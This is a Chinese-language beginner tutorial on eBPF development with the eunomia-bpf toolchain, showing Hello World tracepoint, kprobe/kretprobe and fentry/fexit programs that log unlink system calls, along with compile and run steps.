<p>本文是eBPF入门开发实践教程的第二篇,我们将重点关注如何编写一个简单的eBPF程序,并通过实际例子演示整个开发流程。在阅读本教程之前,建议您先学习第一篇教程,以便对eBPF的基本概念有个大致的了解。</p>
|
||
<p>在开发eBPF程序时,有多种开发框架可供选择,如 BCC(BPF Compiler Collection)libbpf、cilium/ebpf、eunomia-bpf 等。虽然不同工具的特点各异,但它们的基本开发流程大致相同。在接下来的内容中,我们将深入了解这些流程,并以 Hello World 程序为例,带领读者逐步掌握eBPF开发的基本技巧。</p>
|
||
<p>本教程将帮助您了解eBPF程序的基本结构、编译和加载过程、用户空间与内核空间的交互方式以及调试与优化技巧。通过学习本教程,您将掌握eBPF开发的基本知识,并为后续进一步学习和实践奠定坚实的基础。</p>
|
||
<h2 id="ebpf开发环境准备与基本开发流程"><a class="header" href="#ebpf开发环境准备与基本开发流程">eBPF开发环境准备与基本开发流程</a></h2>
|
||
<p>在开始编写eBPF程序之前,我们需要准备一个合适的开发环境,并了解eBPF程序的基本开发流程。本部分将详细介绍这些内容。</p>
|
||
<h3 id="安装必要的软件和工具"><a class="header" href="#安装必要的软件和工具">安装必要的软件和工具</a></h3>
|
||
<p>要开发eBPF程序,您需要安装以下软件和工具:</p>
|
||
<ul>
|
||
<li>Linux 内核:由于eBPF是内核技术,因此您需要具备较新版本的Linux内核(推荐4.8及以上版本),以支持eBPF功能。</li>
|
||
<li>LLVM 和 Clang:这些工具用于编译eBPF程序。安装最新版本的LLVM和Clang可以确保您获得最佳的eBPF支持。</li>
|
||
</ul>
|
||
<p>eBPF 程序主要由两部分构成:内核态部分和用户态部分。内核态部分包含 eBPF 程序的实际逻辑,用户态部分负责加载、运行和监控内核态程序。当您选择了合适的开发框架后,如 BCC(BPF Compiler Collection)、libbpf、cilium/ebpf或eunomia-bpf等,您可以开始进行用户态和内核态程序的开发。以 BCC 工具为例,我们将介绍 eBPF 程序的基本开发流程:</p>
|
||
<p>当您选择了合适的开发框架后,如BCC(BPF Compiler Collection)、libbpf、cilium/ebpf或eunomia-bpf等,您可以开始进行用户态和内核态程序的开发。以BCC工具为例,我们将介绍eBPF程序的基本开发流程:</p>
|
||
<ol>
|
||
<li>安装BCC工具:根据您的Linux发行版,按照BCC官方文档的指南安装BCC工具和相关依赖。</li>
|
||
<li>编写eBPF程序(C语言):使用C语言编写一个简单的eBPF程序,例如Hello World程序。该程序可以在内核空间执行并完成特定任务,如统计网络数据包数量。</li>
|
||
<li>编写用户态程序(Python或C等):使用Python、C等语言编写用户态程序,用于加载、运行eBPF程序以及与之交互。在这个程序中,您需要使用BCC提供的API来加载和操作内核态的eBPF程序。</li>
|
||
<li>编译eBPF程序:使用BCC工具,将C语言编写的eBPF程序编译成内核可以执行的字节码。BCC会在运行时动态从源码编译eBPF程序。</li>
|
||
<li>加载并运行eBPF程序:在用户态程序中,使用BCC提供的API加载编译好的eBPF程序到内核空间,然后运行该程序。</li>
|
||
<li>与eBPF程序交互:用户态程序通过BCC提供的API与eBPF程序交互,实现数据收集、分析和展示等功能。例如,您可以使用BCC API读取eBPF程序中的map数据,以获取网络数据包统计信息。</li>
|
||
<li>卸载eBPF程序:当不再需要eBPF程序时,用户态程序应使用BCC API将其从内核空间卸载。</li>
|
||
<li>调试与优化:使用 bpftool 等工具进行eBPF程序的调试和优化,提高程序性能和稳定性。</li>
|
||
</ol>
|
||
<p>通过以上流程,您可以使用BCC工具开发、编译、运行和调试eBPF程序。请注意,其他框架(如libbpf、cilium/ebpf和eunomia-bpf)的开发流程大致相似但略有不同,因此在选择框架时,请参考相应的官方文档和示例。</p>
|
||
<p>通过这个过程,你可以开发出一个能够在内核中运行的 eBPF 程序。eunomia-bpf 是一个开源的 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。它基于 libbpf 的 CO-RE 轻量级开发框架,支持通过用户态 WASM 虚拟机控制 eBPF 程序的加载和执行,并将预编译的 eBPF 程序打包为通用的 JSON 或 WASM 模块进行分发。我们会使用 eunomia-bpf 进行演示。</p>
|
||
<h2 id="下载安装-eunomia-bpf-开发工具"><a class="header" href="#下载安装-eunomia-bpf-开发工具">下载安装 eunomia-bpf 开发工具</a></h2>
|
||
<p>可以通过以下步骤下载和安装 eunomia-bpf:</p>
|
||
<p>下载 ecli 工具,用于运行 eBPF 程序:</p>
|
||
<pre><code class="language-console">$ wget https://aka.pw/bpf-ecli -O ecli && chmod +x ./ecli
|
||
$ ./ecli -h
|
||
Usage: ecli [--help] [--version] [--json] [--no-cache] url-and-args
|
||
</code></pre>
|
||
<p>下载编译器工具链,用于将 eBPF 内核代码编译为 config 文件或 WASM 模块:</p>
|
||
<pre><code class="language-console">$ wget https://github.com/eunomia-bpf/eunomia-bpf/releases/latest/download/ecc && chmod +x ./ecc
|
||
$ ./ecc -h
|
||
eunomia-bpf compiler
|
||
Usage: ecc [OPTIONS] <SOURCE_PATH> [EXPORT_EVENT_HEADER]
|
||
....
|
||
</code></pre>
|
||
<p>也可以使用 docker 镜像进行编译:</p>
|
||
<pre><code class="language-console">$ docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest # 使用 docker 进行编译。`pwd` 应该包含 *.bpf.c 文件和 *.h 文件。
|
||
export PATH=PATH:~/.eunomia/bin
|
||
Compiling bpf object...
|
||
Packing ebpf object and config into /src/package.json...
|
||
</code></pre>
|
||
<h2 id="hello-world---minimal-ebpf-program"><a class="header" href="#hello-world---minimal-ebpf-program">Hello World - minimal eBPF program</a></h2>
|
||
<p>我们会先从一个简单的 eBPF 程序开始,它会在内核中打印一条消息。我们会使用 eunomia-bpf 的编译器工具链将其编译为 bpf 字节码文件,然后使用 ecli 工具加载并运行该程序。作为示例,我们可以暂时省略用户态程序的部分。</p>
|
||
<pre><code class="language-c">/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */
|
||
#define BPF_NO_GLOBAL_DATA
|
||
#include <linux/bpf.h>
|
||
#include <bpf/bpf_helpers.h>
|
||
#include <bpf/bpf_tracing.h>
|
||
|
||
typedef unsigned int u32;
|
||
typedef int pid_t;
|
||
const pid_t pid_filter = 0;
|
||
|
||
char LICENSE[] SEC("license") = "Dual BSD/GPL";
|
||
|
||
SEC("tp/syscalls/sys_enter_write")
|
||
int handle_tp(void *ctx)
|
||
{
|
||
pid_t pid = bpf_get_current_pid_tgid() >> 32;
|
||
if (pid_filter && pid != pid_filter)
|
||
return 0;
|
||
bpf_printk("BPF triggered sys_enter_write from PID %d.\n", pid);
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>这段程序通过定义一个 handle_tp 函数并使用 SEC 宏把它附加到 sys_enter_write tracepoint(即在进入 write 系统调用时执行)。该函数通过使用 bpf_get_current_pid_tgid 和 bpf_printk 函数获取调用 write 系统调用的进程 ID,并在内核日志中打印出来。</p>
|
||
<ul>
|
||
<li><code>bpf_trace_printk()</code>: 一种将信息输出到trace_pipe(/sys/kernel/debug/tracing/trace_pipe)简单机制。 在一些简单用例中这样使用没有问题, but它也有一些限制:最多3 参数; 第一个参数必须是%s(即字符串);同时trace_pipe在内核中全局共享,其他并行使用trace_pipe的程序有可能会将 trace_pipe 的输出扰乱。 一个更好的方式是通过 BPF_PERF_OUTPUT(), 稍后将会讲到。</li>
|
||
<li><code>void *ctx</code>:ctx本来是具体类型的参数, 但是由于我们这里没有使用这个参数,因此就将其写成void *类型。</li>
|
||
<li><code>return 0</code>;:必须这样,返回0 (如果要知道why, 参考 #139 <a href="https://github.com/iovisor/bcc/issues/139">https://github.com/iovisor/bcc/issues/139</a>)。</li>
|
||
</ul>
|
||
<p>要编译和运行这段程序,可以使用 ecc 工具和 ecli 命令。首先在 Ubuntu/Debian 上,执行以下命令:</p>
|
||
<pre><code class="language-shell">sudo apt install clang llvm
|
||
</code></pre>
|
||
<p>使用 ecc 编译程序:</p>
|
||
<pre><code class="language-console">$ ./ecc minimal.bpf.c
|
||
Compiling bpf object...
|
||
Packing ebpf object and config into package.json...
|
||
</code></pre>
|
||
<p>或使用 docker 镜像进行编译:</p>
|
||
<pre><code class="language-shell">docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest
|
||
</code></pre>
|
||
<p>然后使用 ecli 运行编译后的程序:</p>
|
||
<pre><code class="language-console">$ sudo ./ecli run package.json
|
||
Runing eBPF program...
|
||
</code></pre>
|
||
<p>运行这段程序后,可以通过查看 /sys/kernel/debug/tracing/trace_pipe 文件来查看 eBPF 程序的输出:</p>
|
||
<pre><code class="language-console">$ sudo cat /sys/kernel/debug/tracing/trace_pipe | grep "BPF triggered sys_enter_write"
|
||
<...>-3840345 [010] d... 3220701.101143: bpf_trace_printk: write system call from PID 3840345.
|
||
<...>-3840345 [010] d... 3220701.101143: bpf_trace_printk: write system call from PID 3840345.
|
||
</code></pre>
|
||
<p>按 Ctrl+C 停止 ecli 进程之后,可以看到对应的输出也停止。</p>
|
||
<p>注意:如果正在使用的 Linux 发行版例如 Ubuntu 默认情况下没有启用跟踪子系统可能看不到任何输出,使用以下指令打开这个功能:</p>
|
||
<pre><code class="language-console">$ sudo su
|
||
# echo 1 > /sys/kernel/debug/tracing/tracing_on
|
||
</code></pre>
|
||
<h2 id="ebpf-程序的基本框架"><a class="header" href="#ebpf-程序的基本框架">eBPF 程序的基本框架</a></h2>
|
||
<p>如上所述, eBPF 程序的基本框架包括:</p>
|
||
<ul>
|
||
<li>包含头文件:需要包含 <linux/bpf.h> 和 <bpf/bpf_helpers.h> 等头文件。</li>
|
||
<li>定义许可证:需要定义许可证,通常使用 "Dual BSD/GPL"。</li>
|
||
<li>定义 BPF 函数:需要定义一个 BPF 函数,例如其名称为 handle_tp,其参数为 void *ctx,返回值为 int。通常用 C 语言编写。</li>
|
||
<li>使用 BPF 助手函数:在例如 BPF 函数中,可以使用 BPF 助手函数 bpf_get_current_pid_tgid() 和 bpf_printk()。</li>
|
||
<li>返回值</li>
|
||
</ul>
|
||
<h2 id="tracepoints"><a class="header" href="#tracepoints">tracepoints</a></h2>
|
||
<p>跟踪点(tracepoints)是内核静态插桩技术,跟踪点在技术上只是放置在内核源代码中的跟踪函数,实际上就是在源码中插入的一些带有控制条件的探测点,这些探测点允许事后再添加处理函数。比如在内核中,最常见的静态跟踪方法就是 printk,即输出日志。又比如:在系统调用、调度程序事件、文件系统操作和磁盘 I/O 的开始和结束时都有跟踪点。 于 2009 年在 Linux 2.6.32 版本中首次提供。跟踪点是一种稳定的 API,数量有限。</p>
|
||
<h2 id="github-模板轻松构建-ebpf-项目和开发环境"><a class="header" href="#github-模板轻松构建-ebpf-项目和开发环境">GitHub 模板:轻松构建 eBPF 项目和开发环境</a></h2>
|
||
<p>面对创建一个 eBPF 项目,您是否对如何开始搭建环境以及选择编程语言感到困惑?别担心,我们为您准备了一系列 GitHub 模板,以便您快速启动一个全新的eBPF项目。只需在GitHub上点击 <code>Use this template</code> 按钮,即可开始使用。</p>
|
||
<ul>
|
||
<li><a href="https://github.com/eunomia-bpf/libbpf-starter-template">https://github.com/eunomia-bpf/libbpf-starter-template</a>:基于C语言和 libbpf 框架的eBPF项目模板</li>
|
||
<li><a href="https://github.com/eunomia-bpf/cilium-ebpf-starter-template">https://github.com/eunomia-bpf/cilium-ebpf-starter-template</a>:基于C语言和cilium/ebpf框架的eBPF项目模板</li>
|
||
<li><a href="https://github.com/eunomia-bpf/libbpf-rs-starter-template">https://github.com/eunomia-bpf/libbpf-rs-starter-template</a>:基于Rust语言和libbpf-rs框架的eBPF项目模板</li>
|
||
<li><a href="https://github.com/eunomia-bpf/eunomia-template">https://github.com/eunomia-bpf/eunomia-template</a>:基于C语言和eunomia-bpf框架的eBPF项目模板</li>
|
||
</ul>
|
||
<p>这些启动模板包含以下功能:</p>
|
||
<ul>
|
||
<li>一个 Makefile,让您可以一键构建项目</li>
|
||
<li>一个 Dockerfile,用于为您的 eBPF 项目自动创建一个容器化环境并发布到 Github Packages</li>
|
||
<li>GitHub Actions,用于自动化构建、测试和发布流程</li>
|
||
<li>eBPF 开发所需的所有依赖项</li>
|
||
</ul>
|
||
<blockquote>
|
||
<p>通过将现有仓库设置为模板,您和其他人可以快速生成具有相同基础结构的新仓库,从而省去了手动创建和配置的繁琐过程。借助 GitHub 模板仓库,开发者可以专注于项目的核心功能和逻辑,而无需为基础设置和结构浪费时间。更多关于模板仓库的信息,请参阅官方文档:<a href="https://docs.github.com/en/repositories/creating-and-managing-repositories/creating-a-template-repository">https://docs.github.com/en/repositories/creating-and-managing-repositories/creating-a-template-repository</a></p>
|
||
</blockquote>
|
||
<h2 id="总结"><a class="header" href="#总结">总结</a></h2>
|
||
<p>eBPF 程序的开发和使用流程可以概括为如下几个步骤:</p>
|
||
<ul>
|
||
<li>定义 eBPF 程序的接口和类型:这包括定义 eBPF 程序的接口函数,定义和实现 eBPF 内核映射(maps)和共享内存(perf events),以及定义和使用 eBPF 内核帮助函数(helpers)。</li>
|
||
<li>编写 eBPF 程序的代码:这包括编写 eBPF 程序的主要逻辑,实现 eBPF 内核映射的读写操作,以及使用 eBPF 内核帮助函数。</li>
|
||
<li>编译 eBPF 程序:这包括使用 eBPF 编译器(例如 clang)将 eBPF 程序代码编译为 eBPF 字节码,并生成可执行的 eBPF 内核模块。ecc 本质上也是调用 clang 编译器来编译 eBPF 程序。</li>
|
||
<li>加载 eBPF 程序到内核:这包括将编译好的 eBPF 内核模块加载到 Linux 内核中,并将 eBPF 程序附加到指定的内核事件上。</li>
|
||
<li>使用 eBPF 程序:这包括监测 eBPF 程序的运行情况,并使用 eBPF 内核映射和共享内存进行数据交换和共享。</li>
|
||
<li>在实际开发中,还可能需要进行其他的步骤,例如配置编译和加载参数,管理 eBPF 内核模块和内核映射,以及使用其他高级功能等。</li>
|
||
</ul>
|
||
<p>需要注意的是,BPF 程序的执行是在内核空间进行的,因此需要使用特殊的工具和技术来编写、编译和调试 BPF 程序。eunomia-bpf 是一个开源的 BPF 编译器和工具包,它可以帮助开发者快速和简单地编写和运行 BPF 程序。</p>
|
||
<p>您还可以访问我们的教程代码仓库 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 以获取更多示例和完整的教程,全部内容均已开源。我们会继续分享更多有关 eBPF 开发实践的内容,帮助您更好地理解和掌握 eBPF 技术。</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf-入门开发实践教程二在-ebpf-中使用-kprobe-监测捕获-unlink-系统调用"><a class="header" href="#ebpf-入门开发实践教程二在-ebpf-中使用-kprobe-监测捕获-unlink-系统调用">eBPF 入门开发实践教程二:在 eBPF 中使用 kprobe 监测捕获 unlink 系统调用</a></h1>
|
||
<p>eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。</p>
|
||
<p>本文是 eBPF 入门开发实践教程的第二篇,在 eBPF 中使用 kprobe 捕获 unlink 系统调用。本文会先讲解关于 kprobes 的基本概念和技术背景,然后介绍如何在 eBPF 中使用 kprobe 捕获 unlink 系统调用。</p>
|
||
<h2 id="kprobes-技术背景"><a class="header" href="#kprobes-技术背景">kprobes 技术背景</a></h2>
|
||
<p>开发人员在内核或者模块的调试过程中,往往会需要要知道其中的一些函数有无被调用、何时被调用、执行是否正确以及函数的入参和返回值是什么等等。比较简单的做法是在内核代码对应的函数中添加日志打印信息,但这种方式往往需要重新编译内核或模块,重新启动设备之类的,操作较为复杂甚至可能会破坏原有的代码执行过程。</p>
|
||
<p>而利用 kprobes 技术,用户可以定义自己的回调函数,然后在内核或者模块中几乎所有的函数中(有些函数是不可探测的,例如kprobes自身的相关实现函数,后文会有详细说明)动态地插入探测点,当内核执行流程执行到指定的探测函数时,会调用该回调函数,用户即可收集所需的信息了,同时内核最后还会回到原本的正常执行流程。如果用户已经收集足够的信息,不再需要继续探测,则同样可以动态地移除探测点。因此 kprobes 技术具有对内核执行流程影响小和操作方便的优点。</p>
|
||
<p>kprobes 技术包括的3种探测手段分别时 kprobe、jprobe 和 kretprobe。首先 kprobe 是最基本的探测方式,是实现后两种的基础,它可以在任意的位置放置探测点(就连函数内部的某条指令处也可以),它提供了探测点的调用前、调用后和内存访问出错3种回调方式,分别是 <code>pre_handler</code>、<code>post_handler</code> 和 <code>fault_handler</code>,其中 <code>pre_handler</code> 函数将在被探测指令被执行前回调,<code>post_handler</code> 会在被探测指令执行完毕后回调(注意不是被探测函数),<code>fault_handler</code> 会在内存访问出错时被调用;jprobe 基于 kprobe 实现,它用于获取被探测函数的入参值;最后 kretprobe 从名字中就可以看出其用途了,它同样基于 kprobe 实现,用于获取被探测函数的返回值。</p>
|
||
<p>kprobes 的技术原理并不仅仅包含纯软件的实现方案,它也需要硬件架构提供支持。其中涉及硬件架构相关的是 CPU 的异常处理和单步调试技术,前者用于让程序的执行流程陷入到用户注册的回调函数中去,而后者则用于单步执行被探测点指令,因此并不是所有的架构均支持 kprobes。目前 kprobes 技术已经支持多种架构,包括 i386、x86_64、ppc64、ia64、sparc64、arm、ppc 和 mips(有些架构实现可能并不完全,具体可参考内核的 Documentation/kprobes.txt)。</p>
|
||
<p>kprobes 的特点与使用限制:</p>
|
||
<ol>
|
||
<li>kprobes 允许在同一个被探测位置注册多个 kprobe,但是目前 jprobe 却不可以;同时也不允许以其他的 jprobe 回调函数和 kprobe 的 <code>post_handler</code> 回调函数作为被探测点。</li>
|
||
<li>一般情况下,可以探测内核中的任何函数,包括中断处理函数。不过在 kernel/kprobes.c 和 arch/*/kernel/kprobes.c 程序中用于实现 kprobes 自身的函数是不允许被探测的,另外还有<code>do_page_fault</code> 和 <code>notifier_call_chain</code>;</li>
|
||
<li>如果以一个内联函数为探测点,则 kprobes 可能无法保证对该函数的所有实例都注册探测点。由于 gcc 可能会自动将某些函数优化为内联函数,因此可能无法达到用户预期的探测效果;</li>
|
||
<li>一个探测点的回调函数可能会修改被探测函数的运行上下文,例如通过修改内核的数据结构或者保存与<code>struct pt_regs</code>结构体中的触发探测器之前寄存器信息。因此 kprobes 可以被用来安装 bug 修复代码或者注入故障测试代码;</li>
|
||
<li>kprobes 会避免在处理探测点函数时再次调用另一个探测点的回调函数,例如在<code>printk()</code>函数上注册了探测点,而在它的回调函数中可能会再次调用<code>printk</code>函数,此时将不再触发<code>printk</code>探测点的回调,仅仅是增加了<code>kprobe</code>结构体中<code>nmissed</code>字段的数值;</li>
|
||
<li>在 kprobes 的注册和注销过程中不会使用 mutex 锁和动态的申请内存;</li>
|
||
<li>kprobes 回调函数的运行期间是关闭内核抢占的,同时也可能在关闭中断的情况下执行,具体要视CPU架构而定。因此不论在何种情况下,在回调函数中不要调用会放弃 CPU 的函数(如信号量、mutex 锁等);</li>
|
||
<li>kretprobe 通过替换返回地址为预定义的 trampoline 的地址来实现,因此栈回溯和 gcc 内嵌函数<code>__builtin_return_address()</code>调用将返回 trampoline 的地址而不是真正的被探测函数的返回地址;</li>
|
||
<li>如果一个函数的调用次数和返回次数不相等,则在类似这样的函数上注册 kretprobe 将可能不会达到预期的效果,例如<code>do_exit()</code>函数会存在问题,而<code>do_execve()</code>函数和<code>do_fork()</code>函数不会;</li>
|
||
<li>当在进入和退出一个函数时,如果 CPU 运行在非当前任务所有的栈上,那么往该函数上注册 kretprobe 可能会导致不可预料的后果,因此,kprobes 不支持在 X86_64 的结构下为<code>__switch_to()</code>函数注册 kretprobe,将直接返回<code>-EINVAL</code>。</li>
|
||
</ol>
|
||
<h2 id="kprobe-示例"><a class="header" href="#kprobe-示例">kprobe 示例</a></h2>
|
||
<p>完整代码如下:</p>
|
||
<pre><code class="language-c">#include "vmlinux.h"
|
||
#include <bpf/bpf_helpers.h>
|
||
#include <bpf/bpf_tracing.h>
|
||
#include <bpf/bpf_core_read.h>
|
||
|
||
char LICENSE[] SEC("license") = "Dual BSD/GPL";
|
||
|
||
SEC("kprobe/do_unlinkat")
|
||
int BPF_KPROBE(do_unlinkat, int dfd, struct filename *name)
|
||
{
|
||
pid_t pid;
|
||
const char *filename;
|
||
|
||
pid = bpf_get_current_pid_tgid() >> 32;
|
||
filename = BPF_CORE_READ(name, name);
|
||
bpf_printk("KPROBE ENTRY pid = %d, filename = %s\n", pid, filename);
|
||
return 0;
|
||
}
|
||
|
||
SEC("kretprobe/do_unlinkat")
|
||
int BPF_KRETPROBE(do_unlinkat_exit, long ret)
|
||
{
|
||
pid_t pid;
|
||
|
||
pid = bpf_get_current_pid_tgid() >> 32;
|
||
bpf_printk("KPROBE EXIT: pid = %d, ret = %ld\n", pid, ret);
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>这段代码是一个简单的 eBPF 程序,用于监测和捕获在 Linux 内核中执行的 unlink 系统调用。unlink 系统调用的功能是删除一个文件,这个 eBPF 程序通过使用 kprobe(内核探针)在<code>do_unlinkat</code>函数的入口和退出处放置钩子,实现对该系统调用的跟踪。</p>
|
||
<p>首先,我们导入必要的头文件,如 vmlinux.h,bpf_helpers.h,bpf_tracing.h 和 bpf_core_read.h。接着,我们定义许可证,以允许程序在内核中运行。</p>
|
||
<pre><code class="language-c">#include "vmlinux.h"
|
||
#include <bpf/bpf_helpers.h>
|
||
#include <bpf/bpf_tracing.h>
|
||
#include <bpf/bpf_core_read.h>
|
||
|
||
char LICENSE[] SEC("license") = "Dual BSD/GPL";
|
||
</code></pre>
|
||
<p>接下来,我们定义一个名为<code>BPF_KPROBE(do_unlinkat)</code>的 kprobe,当进入<code>do_unlinkat</code>函数时,它会被触发。该函数接受两个参数:<code>dfd</code>(文件描述符)和<code>name</code>(文件名结构体指针)。在这个 kprobe 中,我们获取当前进程的 PID(进程标识符),然后读取文件名。最后,我们使用<code>bpf_printk</code>函数在内核日志中打印 PID 和文件名。</p>
|
||
<pre><code class="language-c">SEC("kprobe/do_unlinkat")
|
||
int BPF_KPROBE(do_unlinkat, int dfd, struct filename *name)
|
||
{
|
||
pid_t pid;
|
||
const char *filename;
|
||
|
||
pid = bpf_get_current_pid_tgid() >> 32;
|
||
filename = BPF_CORE_READ(name, name);
|
||
bpf_printk("KPROBE ENTRY pid = %d, filename = %s\n", pid, filename);
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>接下来,我们定义一个名为<code>BPF_KRETPROBE(do_unlinkat_exit)</code>的 kretprobe,当从<code>do_unlinkat</code>函数退出时,它会被触发。这个 kretprobe 的目的是捕获函数的返回值(ret)。我们再次获取当前进程的 PID,并使用<code>bpf_printk</code>函数在内核日志中打印 PID 和返回值。</p>
|
||
<pre><code class="language-c">SEC("kretprobe/do_unlinkat")
|
||
int BPF_KRETPROBE(do_unlinkat_exit, long ret)
|
||
{
|
||
pid_t pid;
|
||
|
||
pid = bpf_get_current_pid_tgid() >> 32;
|
||
bpf_printk("KPROBE EXIT: pid = %d, ret = %ld\n", pid, ret);
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 <a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a> 下载和安装 ecc 编译工具链和 ecli 运行时。</p>
|
||
<p>要编译这个程序,请使用 ecc 工具:</p>
|
||
<pre><code class="language-console">$ ecc kprobe-link.bpf.c
|
||
Compiling bpf object...
|
||
Packing ebpf object and config into package.json...
|
||
</code></pre>
|
||
<p>然后运行:</p>
|
||
<pre><code class="language-console">sudo ecli run package.json
|
||
</code></pre>
|
||
<p>在另外一个窗口中:</p>
|
||
<pre><code class="language-shell">touch test1
|
||
rm test1
|
||
touch test2
|
||
rm test2
|
||
</code></pre>
|
||
<p>在 /sys/kernel/debug/tracing/trace_pipe 文件中,应该能看到类似下面的 kprobe 演示输出:</p>
|
||
<pre><code class="language-shell">$ sudo cat /sys/kernel/debug/tracing/trace_pipe
|
||
rm-9346 [005] d..3 4710.951696: bpf_trace_printk: KPROBE ENTRY pid = 9346, filename = test1
|
||
rm-9346 [005] d..4 4710.951819: bpf_trace_printk: KPROBE EXIT: ret = 0
|
||
rm-9346 [005] d..3 4710.951852: bpf_trace_printk: KPROBE ENTRY pid = 9346, filename = test2
|
||
rm-9346 [005] d..4 4710.951895: bpf_trace_printk: KPROBE EXIT: ret = 0
|
||
</code></pre>
|
||
<h2 id="总结-1"><a class="header" href="#总结-1">总结</a></h2>
|
||
<p>通过本文的示例,我们学习了如何使用 eBPF 的 kprobe 和 kretprobe 捕获 unlink 系统调用。更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档:<a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a></p>
|
||
<p>本文是 eBPF 入门开发实践教程的第二篇。下一篇文章将介绍如何在 eBPF 中使用 fentry 监测捕获 unlink 系统调用。</p>
|
||
<p>如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 以获取更多示例和完整的教程。</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf-入门开发实践教程三在-ebpf-中使用-fentry-监测捕获-unlink-系统调用"><a class="header" href="#ebpf-入门开发实践教程三在-ebpf-中使用-fentry-监测捕获-unlink-系统调用">eBPF 入门开发实践教程三:在 eBPF 中使用 fentry 监测捕获 unlink 系统调用</a></h1>
|
||
<p>eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。</p>
|
||
<p>本文是 eBPF 入门开发实践教程的第三篇,在 eBPF 中使用 fentry 捕获 unlink 系统调用。</p>
|
||
<h2 id="fentry"><a class="header" href="#fentry">Fentry</a></h2>
|
||
<p>fentry(function entry)和fexit(function exit)是eBPF(扩展的伯克利包过滤器)中的两种探针类型,用于在Linux内核函数的入口和退出处进行跟踪。它们允许开发者在内核函数执行的特定阶段收集信息、修改参数或观察返回值。这种跟踪和监控功能在性能分析、故障排查和安全分析等场景中非常有用。</p>
|
||
<p>与 kprobes 相比,fentry 和 fexit 程序有更高的性能和可用性。在这个例子中,我们可以直接访问函数的指针参数,就像在普通的 C 代码中一样,而不需要使用各种读取帮助程序。fexit 和 kretprobe 程序最大的区别在于,fexit 程序可以访问函数的输入参数和返回值,而 kretprobe 只能访问返回值。从 5.5 内核开始,fentry 和 fexit 对 eBPF 程序可用。</p>
|
||
<pre><code class="language-c">#include "vmlinux.h"
|
||
#include <bpf/bpf_helpers.h>
|
||
#include <bpf/bpf_tracing.h>
|
||
|
||
char LICENSE[] SEC("license") = "Dual BSD/GPL";
|
||
|
||
SEC("fentry/do_unlinkat")
|
||
int BPF_PROG(do_unlinkat, int dfd, struct filename *name)
|
||
{
|
||
pid_t pid;
|
||
|
||
pid = bpf_get_current_pid_tgid() >> 32;
|
||
bpf_printk("fentry: pid = %d, filename = %s\n", pid, name->name);
|
||
return 0;
|
||
}
|
||
|
||
SEC("fexit/do_unlinkat")
|
||
int BPF_PROG(do_unlinkat_exit, int dfd, struct filename *name, long ret)
|
||
{
|
||
pid_t pid;
|
||
|
||
pid = bpf_get_current_pid_tgid() >> 32;
|
||
bpf_printk("fexit: pid = %d, filename = %s, ret = %ld\n", pid, name->name, ret);
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>这段程序是用C语言编写的eBPF(扩展的伯克利包过滤器)程序,它使用BPF的fentry和fexit探针来跟踪Linux内核函数do_unlinkat。在这个教程中,我们将以这段程序作为示例,让您学会如何在eBPF中使用fentry监测捕获unlink系统调用。</p>
|
||
<p>程序包含以下部分:</p>
|
||
<ol>
|
||
<li>包含头文件:包括vmlinux.h(用于访问内核数据结构)、bpf/bpf_helpers.h(包含eBPF帮助函数)、bpf/bpf_tracing.h(用于eBPF跟踪相关功能)。</li>
|
||
<li>定义许可证:这里定义了一个名为LICENSE的字符数组,包含许可证信息"Dual BSD/GPL"。</li>
|
||
<li>定义fentry探针:我们定义了一个名为BPF_PROG(do_unlinkat)的fentry探针,该探针在do_unlinkat函数的入口处被触发。这个探针获取当前进程的PID(进程ID)并将其与文件名一起打印到内核日志。</li>
|
||
<li>定义fexit探针:我们还定义了一个名为BPF_PROG(do_unlinkat_exit)的fexit探针,该探针在do_unlinkat函数的退出处被触发。与fentry探针类似,这个探针也会获取当前进程的PID并将其与文件名和返回值一起打印到内核日志。</li>
|
||
</ol>
|
||
<p>通过这个示例,您可以学习如何在eBPF中使用fentry和fexit探针来监控和捕获内核函数调用,例如在本教程中的unlink系统调用。</p>
|
||
<p>eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 <a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a> 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。</p>
|
||
<p>编译运行上述代码:</p>
|
||
<pre><code class="language-console">$ ecc fentry-link.bpf.c
|
||
Compiling bpf object...
|
||
Packing ebpf object and config into package.json...
|
||
$ sudo ecli run package.json
|
||
Runing eBPF program...
|
||
</code></pre>
|
||
<p>在另外一个窗口中:</p>
|
||
<pre><code class="language-shell">touch test_file
|
||
rm test_file
|
||
touch test_file2
|
||
rm test_file2
|
||
</code></pre>
|
||
<p>运行这段程序后,可以通过查看 /sys/kernel/debug/tracing/trace_pipe 文件来查看 eBPF 程序的输出:</p>
|
||
